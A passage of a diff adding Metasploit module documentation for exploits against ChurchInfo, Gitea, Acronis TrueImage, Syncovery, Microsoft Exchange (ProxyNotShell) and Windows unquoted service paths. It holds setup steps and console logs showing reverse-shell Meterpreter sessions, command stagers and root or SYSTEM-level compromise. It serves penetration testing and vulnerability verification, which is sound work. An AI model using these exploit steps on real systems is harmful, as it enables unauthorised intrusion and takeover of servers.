+   RHOSTS      127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT       9090             yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI   /churchinfo/     yes       The location of the ChurchInfo app
+   USERNAME    admin            yes       Username for ChurchInfo application
+   VHOST                        no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.30.182.196   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Targeting
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/churchinfo_upload_exec) > set LHOST docker0
+LHOST => docker0
+msf6 exploit(multi/http/churchinfo_upload_exec) > run
+
+[*] Started reverse TCP handler on 172.18.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Target is ChurchInfo!
+[+] The target is vulnerable. Target is running ChurchInfo 1.3.0!
+[+] Logged into application as admin
+[*] Navigating to add items to cart
+[+] Items in Cart: Items in Cart: 2
+[+] Uploading exploit via temp email attachment
+[+] Exploit uploaded to /churchinfo/tmp_attach/ueNYs9.php
+[+] Executing payload with GET request
+[*] Sending stage (39927 bytes) to 172.18.0.2
+[+] Deleted ueNYs9.php
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:37790) at 2022-11-18 17:44:31 -0600
+
+
+meterpreter > getpid
+Current pid: 452
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 8eeaa82293b4
+OS          : Linux 8eeaa82293b4 5.15.0-53-generic #59-Ubuntu SMP Mon Oct 17 18:53:30 UTC 2022 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
@@ -0,0 +1,229 @@
+## Vulnerable Application
+
+[Gitea](https://gitea.io/) is a painless self-hosted Git service community
+managed lightweight code hosting solution written in Go.
+
+This module has been tested successfully on Gitea versions:
+* 1.16.6 with Git 2.30.3 (Docker)
+* 1.16.6 with Git 2.30.2 (Windows 10)
+
+### Description
+
+This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system.
+This vulnerability affect Gitea before 1.16.7 version.
+
+The migration process require valid Git repository address so the module will
+use the Gitea target itself by creating a temporary repository. This scenario
+won't work with [Gitea default configuration](https://github.com/go-gitea/gitea/blob/main/custom/conf/app.example.ini)
+because `ALLOW_LOCALNETWORKS` is disabled. However, it will be ignored when
+[ALLOWED_DOMAINS](https://github.com/go-gitea/gitea/blob/main/custom/conf/app.example.ini#L2289)
+is set, but it must be set to all domain with `*` for this scenario to work.
+
+There is an update in the Git-remote command line starting from version 2.34.0
+which refuses to update the branch pull request URL to the current path.
+
+```
+\testrepo.git>git version
+git version 2.34.0.windows.1
+\testrepo.git>git remote add -f master ./
+Updating master
+fatal: bad object refs/pull/0/head
+error: ./ did not send all necessary objects
+
+error: Could not fetch master
+```
+This causes the exploit to fail because Git-fetch will not executed if the
+Git-remote fail. Details of these limitation are explained
+[here](https://tttang.com/archive/1607/)
+
+### Source and Installers
+
+* [Source Code Repository](https://github.com/go-gitea/gitea/)
+* [Installers](https://dl.gitea.io/gitea/1.16.6)
+* [Docker](https://docs.gitea.io/en-us/install-with-docker/)
+
+### Docker installation
+1. create `docker-compose.yml` file
+```
+version: "3"
+
+networks:
+  gitea:
+    external: false
+
+services:
+  server:
+    image: gitea/gitea:1.16.6
+    container_name: gitea
+    environment:
+      - USER_UID=1000
+      - USER_GID=1000
+    restart: always
+    networks:
+      - gitea
+    volumes:
+      - ./gitea:/data
+      - /etc/timezone:/etc/timezone:ro
+      - /etc/localtime:/etc/localtime:ro
+    ports:
+      - "3000:3000"
+      - "222:22"
+```
+2. run `docker-compose up`
+3. append `ALLOW_LOCALNETWORKS` in the configuration file.
+```
+:~$ cat << EOF >> gitea/gitea/conf/app.ini
+> [migrations]
+> ALLOW_LOCALNETWORKS = true
+> EOF
+```
+4. Navigate to the localhost port 3000 and finish the installation. Note that
+   the first registered user will automatically become administrator so make
+   sure to set the administrator username and password upon installation.
+
+## Verification Steps
+
+1. Navigate to `/user/sign_up` and register normal user
+2. Do: `use unix/webapp/gitea_git_fetch_rce`
+3. Do: `set RHOSTS [ips]`
+4. Do: `set LHOST [lhost]`
+5. Do: `set USERNAME [username]`
+6. Do: `set PASSWORD [password]`
+7. Do: `run`
+8. You should get a shell.
+
+## Options
+
+### USERNAME
+The Gitea valid username to authenticate
+
+### USERNAME
+The Gitea valid password to authenticate
+
+### HTTPDELAY
+Number of seconds the web server will wait to deliver payload (default: 12)
+
+## Scenarios
+### Successful exploitation of Gitea 1.16.6 on Docker
+
+```
+msf6 > use exploit/multi/http/gitea_git_fetch_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 172.17.0.2
+rhosts => 172.17.0.2
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set username msf
+username => msf
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set password qwerty
+password => qwerty
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_fetch_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 1.16.6
+[*] Using URL: http://172.17.0.1:8080/
+[*] Server started.
+[*] Adding hardcoded uri /api/v1/version
+[*] Adding hardcoded uri /api/v1/settings/api
+[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl
+[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl/pulls
+[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl/topics
+[*] Creating repository "u8W2Lu24p"
+[+] Repository created
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgAB..."]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAA...
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Migrating repository
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3020772 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:60744) at 2022-10-03 18:40:15 +0700
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: git
+```
+
+### Successful exploitation of Gitea 1.16.6 on Windows 10
+
+```
+msf6 > use exploit/multi/http/gitea_git_fetch_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set target 2
+target => 2
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 192.168.0.21
+rhosts => 192.168.0.21
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 192.168.0.104
+lhost => 192.168.0.104
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set username yo
+username => yo
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set password password
+password => password
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_fetch_rce) > run
+
+[*] Started reverse TCP handler on 192.168.0.104:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 1.16.6
+[*] Using URL: http://192.168.0.104:8080/
+[*] Server started.
+[*] Adding hardcoded uri /api/v1/version
+[*] Adding hardcoded uri /api/v1/settings/api
+[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5
+[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5/pulls
+[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5/topics
+[*] Creating repository "ExcLF0xBxG"
+[+] Repository created
+[*] Executing command: powershell.exe -nop -w hidden -noni -ep bypass "&([...
+[*] Migrating repository
+[*] Powershell session session 1 opened (192.168.0.104:4444 -> 192.168.0.21:49499) at 2022-10-03 19:03:38 +0700
+[*] Migrating repository
+[*] Powershell session session 1 opened (192.168.0.104:4444 -> 192.168.0.21:49499) at 2022-10-03 19:03:38 +0700
+[*] Server stopped.
+
+PS C:\Users\msf\Downloads\data\gitea-repositories\yo\gu5em72atm5.git> whoami
+msf
+```
+
+### Failed exploitation due to migration settings
+
+```
+msf6 > use exploit/multi/http/gitea_git_fetch_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 172.17.0.2
+rhosts => 172.17.0.2
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set username msf
+username => msf
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set password qwerty
+password => qwerty
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_fetch_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 1.16.6
+[*] Using URL: http://172.17.0.1:8080/
+[*] Server started.
+[*] Adding hardcoded uri /api/v1/version
+[*] Adding hardcoded uri /api/v1/settings/api
+[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w
+[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w/pulls
+[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w/topics
+[*] Creating repository "P7EpcvA"
+[+] Repository created
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAA..."]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAAB...
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Migrating repository
+[*] Server stopped.
+[-] Exploit aborted due to failure: unexpected-reply: Unable to migrate repo:
+You can not import from disallowed hosts, please ask the admin to check
+ALLOWED_DOMAINS/ALLOW_LOCALNETWORKS/BLOCKED_DOMAINS settings.
+[*] Exploit completed, but no session was created.
+```
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+Acronis TrueImage versions 2019 update 1 through 2021 update 1
+are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`
+helper tool does not perform any validation on connecting clients,
+which gives arbitrary clients the ability to execute functions provided
+by the helper tool with `root` privileges.
+
+This module connects to the helper tool and executes the payload via
+the helper tool's `executeProcess:arguments:caller:withReply:;` function,
+granting a session as `root`.
+
+### Installation Instructions
+
+Run through the installer with all of the defaults. Once the application
+is installed, open the application and allow the privileges requested.
+That should be enough for the helper tool to be placed in the
+`/Library/PrivilegedHelperTools` directory. You should not have to set up
+a trial to get the exploit to work.
+
+*Note* The 2021 version of Acronis TrueImage comes with an uninstaller
+that will remove the helper tool if used. However, if the software is
+uninstalled via the drag-and-drop method, the helper tool will be left behind.
+The 2020 version does not appear to come with an uninstaller, so the helper tool
+will need to be manually deleted from `/Library/PrivilegedHelperTools` when
+uninstalling the software.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get a meterpreter or shell session on the target
+4. Do: `use exploit/osx/local/acronis_trueimage_xpc_privesc`
+5. Do: `set SESSION <session_no>`
+6. Do: `run`
+7. You should get a new session as root.
+
+## Options
+
+### WRITABLE_DIR
+
+Directory to use to write exploit files to
+
+### SHELL
+
+Default shell to use for exploit
+
+### COMPILE
+
+Determines if exploit will be compiled on the target or if a pre-compiled exploit
+will be used.
+
+## Scenarios
+
+### Acronis TrueImage Build 22510 on macOS 12.5
+
+```
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Transmitting first stager...(214 bytes)
+[*] Transmitting second stager...(49152 bytes)
+[*] Sending stage (810648 bytes) to 192.168.140.204
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.204:53610) at 2022-11-15 08:44:36 -0600
+
+meterpreter > getuid
+Server username: space
+meterpreter > sysinfo
+Computer     : spaces-Mac.local
+OS           :  (macOS 12.5.0)
+Architecture : x64
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use exploit/osx/local/acronis_trueimage_xpc_privesc
+[*] Using configured payload osx/x64/meterpreter/reverse_tcp
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set session 1
+session => 1
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set lport 5555
+lport => 5555
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set verbose true
+verbose => true
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Vulnerable build 22510 found
+[*] Attempting to write payload at /tmp/FHQUXzNR
+[*] Writing '/tmp/FHQUXzNR' (17204 bytes) ...
+[+] Successfully wrote payload at /tmp/FHQUXzNR
+[*] Successfully compiled iZMwhN.m...Now executing payload
+[*] Transmitting first stager...(214 bytes)
+[*] Transmitting second stager...(49152 bytes)
+[*] Sending stage (810648 bytes) to 192.168.140.204
+[+] Deleted /tmp/FHQUXzNR
+[+] Deleted /tmp/iZMwhN.m
+[+] Deleted /tmp/iZMwhN
+[*] Meterpreter session 2 opened (192.168.140.1:5555 -> 192.168.140.204:53763) at 2022-11-15 08:45:13 -0600
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : spaces-Mac.local
+OS           :  (macOS 12.5.0)
+Architecture : x64
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+```
@@ -0,0 +1,110 @@
+## Vulnerable Application
+[Syncovery For Linux with Web-GUI](https://www.syncovery.com/download/linux/)
+
+This module exploits an authenticated remote code execution vulnerability (CVE-2022-36534)
+in the Web GUI of Syncovery File Sync & Backup Software for Linux.
+Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.
+Jobs can contain arbitrary system commands and will be executed as the user `root`.
+A valid username and password or a session token is needed to exploit the vulnerability.
+
+This affects Syncovery for Linux before v9.48j and all versions of the obsolete branch 8.
+
+Installing a vulnerable version of Syncovery for Linux to test this vulnerability is quite easy.
+Download a vulnerable version of Syncovery for Linux: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
+Install it and once the server is up, you can access it on port 8999 for testing...
+
+## Authors
+
+- Jan Rude (mgm security partners GmbH)
+
+## Platforms
+
+- Unix
+
+## Verification Steps
+
+1. `use exploit/unix/http/syncovery_linux_rce_2022_36534`
+2. `set RHOSTS <TARGET HOSTS>`
+3. `set LHOST <Address of Attacking Machine>`
+4. `run`
+5. You should get a meterpreter shell as the `root` user.
+
+## Options
+
+### USERNAME
+Username used for login. Default is "default".
+
+### PASSWORD
+Password used for login. Default is "pass".
+
+### TOKEN
+Instead of using a username and password it is also possible to use an authentication token.
+A valid token might be successfully brute-forced with the scanner module `syncovery_linux_token_cve_2022_36536`.
+
+### TARGETURI
+The path to Syncovery login.
+
+### PORT
+The (TCP) target port on which Syncovery is running. By default port 8999 is used for HTTP and port 8943 is used for HTTPS.
+
+## Scenarios
+
+### Syncovery for Linux with default credentials
+
+```
+msf6 > use exploits/unix/http/syncovery_linux_rce_2022_36534
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > set rhosts 192.168.178.26
+rhosts => 192.168.178.26
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > set lhost 192.168.178.26
+lhost => 192.168.178.26
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > options
+
+Module options (exploit/unix/http/syncovery_linux_rce_2022_36534):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   pass             yes       The password to Syncovery (default: pass)
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.178.26   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The path to Syncovery
+   TOKEN                       no        A valid session token
+   USERNAME   default          yes       The username to Syncovery (default: default)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.178.26   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Syncovery for Linux < 9.48j
+
+
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > check
+[+] 192.168.178.26:8999 - The target is vulnerable.
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > run
+
+[*] Started reverse TCP handler on 192.168.178.26:4444 
+[+] 192.168.178.26:8999 - Exploit successfully executed
+[*] Sending stage (40132 bytes) to 192.168.178.26
+[*] Meterpreter session 1 opened (192.168.178.26:4444 -> 192.168.178.26:38008) at 2022-09-06 13:44:13 +0200
+
+meterpreter > sysinfo
+Computer        : kali
+OS              : Linux 5.16.0-kali7-amd64 #1 SMP PREEMPT Debian 5.16.18-1kali1 (2022-04-01)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker
+to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to
+obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019.
+
+By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.
+
+This vulnerability affects:
+
+  * Exchange 2013 CU23 < 15.0.1497.44
+  * Exchange 2016 CU22 < 15.1.2375.37
+  * Exchange 2016 CU23 < 15.1.2507.16
+  * Exchange 2019 CU11 < 15.2.986.36
+  * Exchange 2019 CU12 < 15.2.1118.20
+
+*Source: [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: November 8, 2022 (KB5019758)][1]*
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/http/exchange_proxynotshell_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set USERNAME [USERNAME]`
+5. Do: `set PASSWORD [PASSWORD]`
+6. Do: `run`
+
+## Advanced Options
+### EemsBypass
+
+Technique to bypass the EEMS rule.
+
+**none** -- Make no attempt to bypass the EEMS rule. This can be used with the `check` method to determine if the EEMS 
+M1 rule is applied.
+**IBM037v1** -- Use IBM037 encoding combined with the `X-Up-Devcap-Post-Charset` header and `UP` User-Agent prefix. See
+[ProxyNotRelay][2] for more information.
+
+### MaxBackendRetries
+
+The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments
+where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.
+
+## Scenarios
+
+### Version and OS
+
+```
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11
+RHOSTS => 192.168.159.11
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle
+USERNAME => aliddle
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Sending stage (175686 bytes) to 192.168.159.11
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.11:7290) at 2022-11-18 17:32:18 -0500
+
+meterpreter > 
+```
+
+[1]: https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-8-2022-kb5019758-2b3b039b-68b9-4f35-9064-6b286f495b1d
+[2]: https://rw.md/2022/11/09/ProxyNotRelay.html
@@ -10,9 +10,9 @@ This vulnerability affects:

  * Exchange 2013 CU23 < 15.0.1497.15
  * Exchange 2016 CU19 < 15.1.2176.12
-  * Exchange 2016 CU20 < 15.1.2242.5
+  * Exchange 2016 CU20 < 15.1.2242.8
  * Exchange 2019 CU8 < 15.2.792.13
-  * Exchange 2019 CU9 < 15.2.858.9
+  * Exchange 2019 CU9 < 15.2.858.10

 *Source: [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: April 13, 2021 (KB5001779)][1]*

@@ -87,6 +87,11 @@ The path where you want to write the backdoor. Default: `aspnet_client`

 This is MAPI client version sent in the request.

+### MaxBackendRetries
+
+The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments
+where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.
+
 ## Scenarios

 ### Exchange 2016 CU 19 on Server 2016
@@ -12,11 +12,11 @@ As is documented in that write-up, if the executable is C:\Program Files\A Subfo

 Windows will attempt to run the following, in order.

-  1.  C:\Program.exe
-  2.  C:\Program Files\A.exe
-  3.  C:\Program Files\A Subfolder\B.exe
-  4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
-  5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
+1.  C:\Program.exe
+2.  C:\Program Files\A.exe
+3.  C:\Program Files\A Subfolder\B.exe
+4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
+5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe

 To exploit this, we simply need to go in reverse order to see if we're able to write a payload to those locations.
 In Win7+ the deeper folders are more likely to succeed based on default Windows permissions for users.
@@ -35,127 +35,97 @@ This is sourced from @sumitvgithub's write-up
 With an administrator command prompt, execute the following:

 ```
-sc create "Some Vulnerable Service" binpath= "C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe" Displayname= "Vuln Service DP" start= auto
-mkdir "C:\Program Files\A Subfolder\B Subfolder\C Subfolder"
+sc create "Some Vulnerable Service" binpath= "C:\Program Files\A Subfolder\B Subfolder\C Sub folder\SomeExecutable.exe" Displayname= "Vuln Service DP" start= auto
+mkdir "C:\Program Files\A Subfolder\B Subfolder\C Sub folder"
 icacls "C:\Program Files\A Subfolder" /grant "BUILTIN\Users":W
 ```

+If you want to allow the user to restart the service:
+```
+wmic useraccount get name,sid
+sc sdset "Some Vulnerable Service" D:(A;;RPWP;;;place-sid-here)
+```
+
 This creates a vulnerable service, with `A Subfolder` being vulnerable to user writes.

 ## Verification Steps

-  1. Start msfconsole
-  2. Get a user shell
-  3. Do: ```use exploits/windows/local/unquoted_service_path```
-  4. Do: ```set session #```
-  5. Do: ```run```
-  6. You should either get a shell, or need to start a `multi/handler` and have the target restarted.
+1. Start msfconsole
+2. Get a user shell
+3. Do: `use exploits/windows/local/unquoted_service_path`
+4. Do: `set session #`
+5. Do: `run`
+6. You should get an elevated shell.

 ## Options

-### QUICK
-
-If only the first service should attempt to be exploited, or all of them (sequentially).  Default is `true`
-
 ## Scenarios

-### Windows 10 (16299) with Service Listed Above
-
+### Windows 10 21H2

 ```
-[*] Using exploit/windows/local/unquoted_service_path
-resource (unquoted.rb)> setg verbose true
-verbose => true
-resource (unquoted.rb)> set payload windows/meterpreter/reverse_tcp
-payload => windows/meterpreter/reverse_tcp
-resource (unquoted.rb)> setg lhost 1.1.1.1
-lhost => 1.1.1.1
-resource (unquoted.rb)> setg lport 4444
-lport => 4444
-resource (unquoted.rb)> set session 1
+msf6 exploit(windows/local/unquoted_service_path) > set session 1
 session => 1
-msf5 exploit(windows/local/unquoted_service_path) > 
-[*] Sending stage (180291 bytes) to 2.2.2.2
-[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49696) at 2020-04-10 14:41:32 -0400
+msf6 exploit(windows/local/unquoted_service_path) > set verbose true
+verbose => true
+msf6 exploit(windows/local/unquoted_service_path) > set lhost 192.168.159.128
+lhost => 1.1.1.1
+msf6 exploit(windows/local/unquoted_service_path) > set lport 9090
+lport => 9090
+msf6 exploit(windows/local/unquoted_service_path) > exploit

-msf5 exploit(windows/local/unquoted_service_path) > sessions -i 1
-[*] Starting interaction with 1...
-
-meterpreter > sysinfo
-Computer        : MSEDGEWIN10
-OS              : Windows 10 (10.0 Build 16299).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 2
-Meterpreter     : x86/windows
-meterpreter > getuid
-Server username: MSEDGEWIN10\IEUser
-meterpreter > background
-[*] Backgrounding session 1...
-msf5 exploit(windows/local/unquoted_service_path) > run
-
-[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Started reverse TCP handler on 192.168.159.128:9090 
 [*] Finding a vulnerable service...
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[+] Found vulnerable service: Some Vulnerable Service - C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe (LocalSystem)
-[*] Attempting exploitation of Some Vulnerable Service
-[*] Enumerating vulnerable paths
-[*] Checking writability to: C:\Program Files\A Subfolder\B Subfolder
-[-] Path not writable
-[*] Checking writability to: C:\Program Files\A Subfolder
-[+] Path is writable
-[*] Placing C:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
-[*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
-[+] Manual cleanup of C:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
-[+] Successfully wrote payload
-[*] Launching service Some Vulnerable Service...
-[*] Manual cleanup of the payload file is required. Some Vulnerable Service will fail to start as long as the payload remains on disk.
-[-] [Some Vulnerable Service] Unhandled error: Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
-[-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
-[*] Exploit completed, but no session was created.
-```
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. Falling back to registry technique
+[+] Found potentially vulnerable service: Vuln Service 1 - C:\Program Files\A Subfolder\B Subfolder\C Sub folder\SomeExecutable.exe (LocalSystem)
+[*]   Enumerating vulnerable paths
+[-]     C:\Program Files\A Subfolder\B Subfolder\ is not writable
+[+]     C:\Program Files\A Subfolder\ is writable
+[*]       Placing C:\Program Files\A Subfolder\B.exe for Vuln Service 1
+[*]       Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
+[+]       Successfully wrote payload
+[*] [Vuln Service 1] Restarting service
+[-] [Vuln Service 1] Restarting service failed: Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
+[-]       Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!
+[-]     C:\Program Files\ is not writable
+[-]     C:\ is not writable
+[+] Found potentially vulnerable service: Vuln Service 2 - C:\Program Files\D Subfolder\E Subfolder\F Sub folder\SomeExecutable.exe (LocalSystem)
+[*]   Enumerating vulnerable paths
+[-]     C:\Program Files\D Subfolder\E Subfolder\ is not writable
+[+]     C:\Program Files\D Subfolder\ is writable
+[*]       Placing C:\Program Files\D Subfolder\E.exe for Vuln Service 2
+[*]       Attempting to write 15872 bytes to C:\Program Files\D Subfolder\E.exe...
+[+]       Successfully wrote payload
+[*] [Vuln Service 2] Restarting service
+[*] Sending stage (175686 bytes) to 192.168.159.87
+[+] [Vuln Service 2] Service started
+[+] Deleted C:\Program Files\A Subfolder\B.exe
